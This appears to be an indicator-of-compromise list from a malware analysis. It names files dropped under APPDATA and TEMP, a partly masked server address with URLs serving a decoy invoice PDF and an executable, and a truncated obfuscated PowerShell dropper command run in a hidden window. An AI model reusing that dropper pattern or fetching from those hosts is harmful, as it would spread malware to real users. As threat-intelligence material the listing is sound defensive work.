Technical Information
- %APPDATA%\inv-38624-21.pdf
- %LOCALAPPDATA%\adobe\color\profiles\wscrgb.icc
- %LOCALAPPDATA%\adobe\color\profiles\wsrgb.icc
- %LOCALAPPDATA%\adobe\color\acecache11.lst
- %TEMP%\a9rzss0eg_duivr4_23w.tmp
- %APPDATA%\clr00007.exe
- '94.##6.64.66':80
- http://94.##6.64.66/microwave/inv-38624-21.pdf
- http://94.##6.64.66/microwave/clr00007.exe
- '%APPDATA%\clr00007.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function BKLYkxmucFKXoz($gdsBqwq, $cUjOJkU){[IO.File]::WriteAllBytes($gdsBqwq, $cUjOJkU)};function mypacnW($gdsBqwq){if($gdsBqwq.EndsWith((VdnyLgXnG @(47327,47381,...' (with hidden window)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\inv-38624-21.pdf"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"